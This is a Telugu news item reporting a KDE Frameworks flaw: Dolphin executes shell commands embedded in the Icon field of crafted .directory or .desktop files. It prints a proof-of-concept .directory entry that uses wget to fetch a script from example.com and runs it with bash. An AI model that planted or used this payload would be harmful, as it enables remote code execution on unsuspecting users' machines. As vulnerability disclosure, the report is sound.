ఫైళ్ల జాబితాను వీక్షిస్తున్నప్పుడు KDE కోడ్ అమలు దుర్బలత్వం

KDE లో గుర్తించారు దుర్బలత్వం, ఇది ప్రత్యేకంగా రూపొందించిన “.desktop” మరియు “.directory” ఫైల్‌లను కలిగి ఉన్న డైరెక్టరీని లేదా ఆర్కైవ్‌ను వినియోగదారు వీక్షించినప్పుడు దాడి చేసే వ్యక్తిని ఏకపక్ష ఆదేశాలను అమలు చేయడానికి అనుమతిస్తుంది. దాడికి వినియోగదారు డాల్ఫిన్ ఫైల్ మేనేజర్‌లోని ఫైల్‌ల జాబితాను వీక్షించడం, హానికరమైన డెస్క్‌టాప్ ఫైల్‌ను డౌన్‌లోడ్ చేయడం లేదా డెస్క్‌టాప్‌పైకి లేదా డాక్యుమెంట్‌లోకి సత్వరమార్గాన్ని లాగడం అవసరం. లైబ్రరీల ప్రస్తుత విడుదలలో సమస్య వ్యక్తమవుతుంది KDE ఫ్రేమ్‌వర్క్‌లు 5.60.0 మరియు పాత సంస్కరణలు, KDE 4 వరకు. దుర్బలత్వం ఇప్పటికీ ఉంది అవశేషాలు సరిదిద్దలేదు (CVE కేటాయించబడలేదు).

KDesktopFile క్లాస్ యొక్క సరికాని అమలు వల్ల సమస్య ఏర్పడింది, ఇది “Icon” వేరియబుల్‌ను ప్రాసెస్ చేస్తున్నప్పుడు, సరైన ఎస్కేపింగ్ లేకుండా, విలువను KConfigPrivate::expandString() ఫంక్షన్‌కి పంపుతుంది, ఇది ప్రాసెసింగ్‌తో సహా షెల్ ప్రత్యేక అక్షరాల విస్తరణను నిర్వహిస్తుంది. స్ట్రింగ్స్ “$(..)” కమాండ్‌లుగా అమలు చేయాలి . XDG స్పెసిఫికేషన్ యొక్క అవసరాలకు విరుద్ధంగా, అమలు బహిర్గతం సెట్టింగుల రకాన్ని వేరు చేయకుండా షెల్ నిర్మాణాలు ఉత్పత్తి చేయబడతాయి, అనగా. ప్రారంభించాల్సిన అప్లికేషన్ యొక్క కమాండ్ లైన్‌ను నిర్ణయించేటప్పుడు మాత్రమే కాకుండా, డిఫాల్ట్‌గా ప్రదర్శించబడే చిహ్నాలను పేర్కొనేటప్పుడు కూడా.

ఉదాహరణకు, దాడి చేయడానికి చాలు ".డైరెక్టరీ" ఫైల్‌ని కలిగి ఉన్న డైరెక్టరీతో యూజర్‌కి జిప్ ఆర్కైవ్‌ను పంపండి:

[డెస్క్‌టాప్ ఎంట్రీ] రకం=డైరెక్టరీ
చిహ్నం[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

మీరు డాల్ఫిన్ ఫైల్ మేనేజర్‌లో ఆర్కైవ్ కంటెంట్‌లను వీక్షించడానికి ప్రయత్నించినప్పుడు, https://example.com/FILENAME.sh స్క్రిప్ట్ డౌన్‌లోడ్ చేయబడుతుంది మరియు అమలు చేయబడుతుంది.


మూలం: opennet.ru

ఒక వ్యాఖ్యను జోడించండి